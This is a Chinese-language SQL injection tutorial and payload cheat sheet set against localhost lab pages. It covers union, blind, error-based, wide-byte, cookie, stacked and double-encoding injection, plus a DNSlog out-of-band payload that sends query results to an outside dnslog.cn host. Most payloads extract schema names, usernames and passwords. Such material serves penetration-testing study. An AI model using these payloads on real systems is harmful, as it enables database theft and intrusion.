sql注入


SQL注入定義

SQL注入即是指web應用程序對用戶輸入數據的合法性沒有判斷或過濾不嚴,攻擊者可以在web應用程序中事先定義好的查詢語句的結尾上添加額外的SQL語句,在管理員不知情的情況下實現非法操作,以此來實現欺騙數據庫服務器執行非授權的任意查詢,從而進一步得到相應的數據信息。

注入類型:

當輸入參數為字符串時,稱為字符型。數字型與字符型注入最大的區別在於:數字型不需要單引號閉合,而字符串類型一般要使用單引號來閉合。

判斷數據庫類型:

判斷是否是 Mysql數據庫
' and exists(select*from information_schema.tables) --+

判斷是否是 access數據庫
' and exists(select*from msysobjects) --+

判斷是否是 Sqlserver數據庫
' and exists(select*from sysobjects) --+

判斷是否是Oracle數據庫
' and (select count(*) from dual)>0 --+

判斷注入點

數字型:id=2-1(在URL編碼中+代表空格,可能會造成混淆)

字符型:' 、')、 '))、 "、 ")、 "))

注釋符:--空格、--+、/**/、#


UNION注入:

union聯合查詢適用於有顯示列的注入,可以通過order by來判斷當前表的列數

因為頁面只顯示一行數據,所以union注入需要將前面的條件否定(把參數變為負)

union注入可能需要用到的一些信息:

version() :數據庫的版本

database() :當前所在的數據庫

@@basedir : 數據庫的安裝目錄

@@datadir : 數據庫文件的存放目錄

user() : 數據庫的用戶

current_user() : 當前用戶名

system_user() : 系統用戶名

session_user() :連接到數據庫的用戶名

MYSQL5.0以下沒有information_schema這個系統表,無法列表名等,只能暴力跑表名。,5.0以下是多用戶單操作,5.0以上是多用戶多操做。

獲得所有的數據庫

?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

獲得所有的表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables --+

獲得指定數據庫所有的表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

獲得所有的列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns --+

獲得指定數據庫指定表的列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

獲取具體字段

?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from users --+

獲取當前數據庫中指定表的指定字段的值(只能是database()所在的數據庫內的數據,因為處於當前數據庫下的話不能查詢其他數據庫內的數據)

?id=-1' union select 1,group_concat(password),3 from users --+


盲注:

**判斷是否存在延時注入:**

http://127.0.0.1/mysql/Less-1/?id=1' and sleep(5) --+

http://127.0.0.1/mysql/Less-1/?id=1' and benchmark(100000000,md5(1)) --+

**判斷當前數據庫**

布爾盲注

數據庫database()的長度大於10

'and (length(database()))>10 --+

數據庫database()的第一個字符ascii值大於100

' and ascii(substr(database(),1,1))>100 --+

時間盲注

數據庫database()的長度大於10

' and if((length(database())>10),1,sleep(5)) --+

數據庫的第一個字符的ascii值小於100

' and if((ascii(substring(database(),1,1)))<100,1,sleep(5)) --+

**判斷當前數據庫中的表**

布爾盲注

判斷當前數據庫中的表的個數是否大於5

' and (select count(table_name) from information_schema.tables where table_schema=database())>5 --+
判斷第一個表的長度

' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

判斷第一個表的第一個字符的ascii值

' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+

時間盲注

判斷當前數據庫中的表的個數是否大於5

' and if((select count(table_name) from information_schema.tables where table_schema=database())>5,1,sleep(5)) --+

判斷第一個表的長度

' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6,1,sleep(5)) --+

判斷第一個表的第一個字符的ascii值

' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,1,sleep(5)) --+

**判斷表中的字段**

布爾盲注

如果已經證實了存在users表,那么猜測是否存在username字段

' and exists(select username from users) --+

判斷表中字段的個數

' and (select count(column_name) from information_schema.columns where table_name='users')>5 --+

判斷第一個字段的長度

' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5 --+

判斷第一個字段第一個字符的ascii值

' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100 --+

時間盲注

如果已經證實了存在users表,那么猜測是否存在username字段

' and if(exists(select username from users),1,sleep(5)) --+

判斷表中字段的個數

' and if((select count(column_name) from information_schema.columns where table_name='users')>5,1,sleep(5)) --+

判斷第一個字段的長度

' and if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5,1,sleep(5)) --+

判斷第一個字段第一個字符的ascii值

' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100,1,sleep(5)) --+

**判斷字段中的數據**

布爾盲注

判斷第一個數據的長度

' and length(select id from users limit 0,1)>5 --+

判斷第一個數據第一個字符的ascii值

' and ascii(substr((select id from users limit 0,1),1,1))>100 --+

時間盲注

判斷第一個數據的長度

' and if(length(select id from users limit 0,1)>5,1,sleep5()) --+

判斷第一個數據第一個字符的ascii值

' and if(ascii(substr((select id from users limit 0,1),1,1))>100,1,sleep(5)) --+


使用正則表達式進行盲注

判斷第一個表名的第一個字符是否是a-z中的字符

http://127.0.0.1/mysql/Less-2/?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '[1]' LIMIT 0,1) --+

然后依據頁面回顯判斷是否正確,最后得到第一個字符為e

然后判斷第一個表名的第二個字符是否是a-z中的字符

http://127.0.0.1/mysql/Less-2/?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e[a-z]') --+

依次猜第三個第四個字符。。。


DNS外帶注入

在實際測試一些網站的安全性問題的時候,有些測試命令執行后是無回顯的,可以寫腳本來進行盲注,但有些網站會封禁掉ip地址,這樣可以通過設置ip代理池解決,但是遇到盲注往往效率很低,所以產生了DNSlog注入

MySQL通過DNSlog盲注需要用到load_file()函數,該函數不僅能加載本地文件,同時也能對URL發起請求。因為需要使用load_file()函數,所以需要root權限,並且secure_file_priv需要為空

Payload:

(SELECT LOAD_FILE(CONCAT('\\\\',(要查詢的語句),'.xx.xx.xx\\abc')))

執行的語句:

image

刷新dns平台:

image

因為Linux沒有UNC路徑這個東西,所以當MySQL處於Linux系統中的時候,是不能使用這種方式外帶數據的 ,這也就解釋了為什么CONCAT()函數拼接了4個\了,因為轉義的原因,4個就變\成了2個\,目的就是利用UNC路徑。

首先獲取一個dnslog地址,然后拼接到sql語句中。

image

當數據發送后,dnsLog被記錄下來。

image

也可以在命令之中用HEX編碼。Hex編碼的目的就是減少干擾,因為很多事數據庫字段的值可能是有特殊符號的,這些特殊符號拼接在域名里無法做dns查詢,因為域名是有一定的規范,有些特殊符號不能帶入。

http://127.0.0.1/mysql/Less-1/?id=1' and (select load_file(concat('\\',hex((select table_name from information_schema.tables where table_schema=database() limit 1)),'.x14y65.dnslog.cn\abc')))%23

image

解碼后得到第一個表名

image

當然通過DNSlog也可以盲打xss

payload:

<img src=http://rep964.dnslog.cn>

image

DNSLog平台收到的DNS查詢,即可證明存在XSS

image


報錯注入:

floor報錯原理

需要用到count(),floor(rand()2),group by這些方法,來看一下都有什么用。

floor作用是向下取整

image

rand()表示0-1隨機數,rand()*2就相當於0-2的隨機數,每次運算結果都不同

image

先查詢users表中數據

image

floor(rand(0)*2) 每次的結果是隨機的(users表中有13條數據)

image

而當提供了參數0后,floor(rand(0)*2)的每次結果都相同(users表中有13條數據)

image

count(*)表示字段數

image

group by表示以誰來排序,比如

image

下面這個依照group by生成的相當於一個新表,先掃描password字段,如果這個字段不存在就插入,然后把count(*)置為1。像password為admin2有兩個用戶,第二個用戶插入的時候已經有admin2這個字段了,也就不會重新生成一個新的admin2字段,而是在count(*)的基礎上加1,直到依照password掃描完整個表,就形成了以password排序的新表了。

關鍵點:

1.group by后面的主鍵是不能重復的,這是floor報錯的關鍵點

2.在執行group by語句時,group by 后面的字段會被運算兩次

第一次運算:group by拿到字段后在表內對比,如果后面字段已經存在,直接插入,不進行二次運算

第二次運算:如果order by后面的字段不存在,則進行二次運算,由於ran()的隨機性,第二次的運算和第一次可能不一樣,這時候插入可能會導致錯誤的產生。

由於 select floor(rand(0)*2) from users每次結果都相同比較好比較,所以就拿這個查詢語句來做演示

select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x

因為users有13個字段,(floor(rand(0)*2)由上面的圖也已經確定了為0,1,1,0,1,1,0,0,1,1,1,0,1。

查詢的第一項:

floor(rand(0)*2)=0,結果為0@5.7.26,因為表中還沒有這個值,所以會直接插入,count(*)置為1
但是依照上面第2條關鍵點,在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1了,所以這張表會先變為

                             x                             count(*)
                       1@5.7.26                                1

查詢的第二項:

因為第一個插入進行了兩次運算,所以floor(rand(0)*2)=1,結果就為1@5.7.26,因為表中x已經有了 1@5.7.26這個字段,依照上面的第2個關鍵點,直接插入,不進行第二次運算。所以這張表會再變為

                             x                             count(*)
                       1@5.7.26                                2

查詢的第三項:

前面兩次進行了三次運算,這次floor(rand(0)*2)=0,結果為0@5.7.26,表中沒有這個字段,會直接插入,count(*)置為1

但是依照上面第2條關鍵點,在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1,相應的字段就變為了1@5.7.26。這個時候問題就來了:

表中已經有以1@5.7.26為主鍵的數據了,插入失敗,然后就報錯了

payload:

select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x

跟前面的查詢語句也是一個道理,只是floor(rand()*2)沒有floor(rand(0)*2)穩定

ExtractValue報錯原理

extractvalue()是對XML文檔進行查詢的函數

語法為:extractvalue(目標xml文檔,xml路徑)

第二個參數 xml中的位置是可操作的地方,xml文檔中查找字符位置是用 /aa/bb/cc/dd/a這種路徑或者純英文純數字格式,但是寫入其他格式就會報錯,並且會返回寫入的非法格式內容

所以可以把想要得到的數據寫到xml路徑中從而返回該數據。

image

可以看到只要路徑滿足條件無論結果是否有值都不會報錯,而這里version()已經報錯了,說明路徑也不能存在點號。

可以以不是xml格式的語法的內容開頭,然后報錯,但是會顯示無法識別的內容是什么,這樣就達到了目的

image

extractvalue()能查詢字符串的最大長度為32,就是說如果我們想要的結果超過32,就需要用substring()函數截取,一次查看32位:

payload:

select username from users where id=1 and (extractvalue('anything',concat('#',substring(hex((select database())),1,32)))

image

image

UpdateXml報錯原理

updatexml()函數跟extractvalue()類似,是XML文檔進行查詢的函數。

語法為:updatexml(目標xml文檔,xml路徑,更新的內容)

報錯方式也類似,滿足/aa/bb/cc,全數字,全英文

image

payload:

select username from users where id=1 and (updatexml('anything',concat('+',(select database())),'anything'));

image

利用:

就用爆當前數據庫做演示,其他的語句大同小異

floor報錯注入:

' and (select 1 from (select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)b) --+

ExtractValue報錯注入:

' and extractvalue(1, concat(0x7e, (select database()),0x7e))--+

能查詢字符串的最大長度為32,如果長度大於32位分段讀取

' and (extractvalue('anything',concat('#',substring(hex((select database())),1,32))))--+

UpdateXml報錯注入:

' and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1)) --+


寬字節注入:

Mysql在使用GBK編碼時,會認為兩個字符為一個漢字。寬字節注入就是發生在PHP向Mysql請求時字符集使用了GBK編碼

關於寬字節注入的幾個函數:

addslashes() :預定義字符之前添加反斜杠 \ 。預定義字符: 單引號 ' 、雙引號 " 、反斜杠 \ 、NULL。但是這個函數有一個特點就是雖然會添加反斜杠 \ 進行轉義,但是 \ 並不會插入到數據庫中。這個和魔術引號的作用完全相同。所以,如果魔術引號打開了,就不要使用 addslashes() 函數了。

mysql_real_escape_string() :這個函數用來轉義sql語句中的特殊符號x00 、\n 、\r 、\ 、‘ 、“ 、x1a。

magic_quotes_gpc(魔術引號):當打開時,所有的單引號’ 、雙引號" 、反斜杠\ 和 NULL 字符都會被自動加上一個反斜線來進行轉義,

這三個函數都會把'轉義,會轉義成 \'

當對用戶輸入的id用 addslashes() 函數進行了處理,並執行id=1'--+時,MySQL實際執行的語句是id='1\'--+

image

很明顯這是沒有注入成功的,單引號並沒有閉合。

這里需要利用到MySQL的一個特性。MySQL在使用GBK編碼的時候,會認為兩個字符是一個漢字,前提是前一個字符的 ASCII 值大於128,才會認為是漢字

當提交的是 id=1%df'--+時,MySQL執行的語句就會變成id='1%df%5c%27--+ ,MySQL正是把%df%5c當成了漢字 運 來處理,所以最后 %27 也就是單引號逃脫了出來,這樣就發生了報錯。

image

寬字節修復:

1.使用 mysql_real_escape_string()
在執行 sql 注入之前必須使用 mysql_set_charset 指定 php 連接 mysql 的字符集單獨調用 mysql_real_escape_string 是無法防御的

image

2.將 character_set_client 設置為binary(二進制)。

image


cookie注入

先訪問帶參數的網址127.0.0.1/product_list.asp?smallclass=148

去掉參數:127.0.0.1/product_list.asp?

查看頁面顯示是否正常,如果不正常,說明參數在數據傳遞中是直接起作用的

f12輸入:alert(document.cookie="smallclass="+escape("148"));

會出現一個彈窗。

image

127.0.0.1/product_list.asp?頁面刷新后網站顯示正常。

接下來:

1.輸入:javascript:alert(document.cookie="smallclass="+escape("148 and 1=1"));

彈窗,然后輸入127.0.0.1product_list.asp頁面正常。

2.輸入javascript:alert(document.cookie="smallclass="+escape("148 and 1=2"));

彈窗,再輸入127.0.0.1/product_list.asp頁面不正常

現在可以確定該網站存在注入漏洞,並且可以通過Cookie進行注入。

然后換語句猜解字段數:

javascript:alert(document.cookie="smallclass="+escape("148 order by 12"));

或者使用sqlmap后加入參數 --cookie "smallclass=148" --table --level 2


堆疊注入:

堆疊注入(Stacked injections)就是將多條sql語句以;分隔,並同時執行多條任意語句。

查詢users表並創建一個跟users類似的表

select * from users where id=1;create table test123 like users;

看是否創建成功:

image


二次編碼注入:

漏洞產生原因:

后端程序的編碼函數,如urldecode(),rawurldecode()等,與PHP本身處理編碼時,放在了一個尷尬的使用位置,與PHP自身編碼配合失誤,其本質就是將%2527先解碼成%27再解碼成單引號

實例:

image

如果提交:http://127.0.0.1/sql.php?id=1%27

就可以繞過對'的轉義,從而造成了sql注入攻擊

image

在測試時,如果發現了頁面可能存在二次編碼注入漏洞,可在注入點后加上%2527然后用sqlmap跑

python3 sqlmap.py -u "http://127.0.0.1/erci.php?id=1%27*"

image

或者使用自帶的腳本chardoubleencode.py進行注入

image

還有幾個沒總結到,慢慢補吧。。。


  1. a-z ↩︎


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM